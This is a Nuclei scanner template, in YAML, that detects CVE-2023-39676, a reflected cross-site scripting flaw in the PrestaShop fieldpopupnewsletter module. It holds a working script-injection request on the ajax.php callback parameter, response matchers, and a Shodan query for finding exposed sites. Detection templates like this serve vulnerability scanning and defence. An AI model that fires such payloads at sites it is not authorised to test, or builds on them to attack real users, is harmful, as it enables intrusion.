49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: CVE-2023-39676
|
|
|
|
info:
|
|
name: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting
|
|
author: meme-lord
|
|
severity: medium
|
|
description: |
|
|
Fieldpopupnewsletter Prestashop Module v1.0.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the callback parameter at ajax.php.
|
|
reference:
|
|
- https://blog.sorcery.ie/posts/fieldpopupnewsletter_xss/
|
|
- https://sorcery.ie
|
|
- https://themeforest.net/user/fieldthemes
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-39676
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00183
|
|
epss-percentile: 0.55331
|
|
cpe: cpe:2.3:a:fieldthemes:fieldpopupnewsletter:1.0.0:*:*:*:*:prestashop:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: fieldthemes
|
|
product: fieldpopupnewsletter
|
|
framework: prestashop
|
|
shodan-query: html:"fieldpopupnewsletter"
|
|
tags: cve,cve2023,prestashop,xss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.domain)</script>"
|
|
- "Invalid email"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100d0d35428bba9e70273fea5a3bd07fd1004afd938750a842f36a3b16d33139792022100f3b9ac569027c6055d2b00643a883ad24851f832912508b48cccff21c85b7997:922c64590222798bb761d5b6d8e72950
|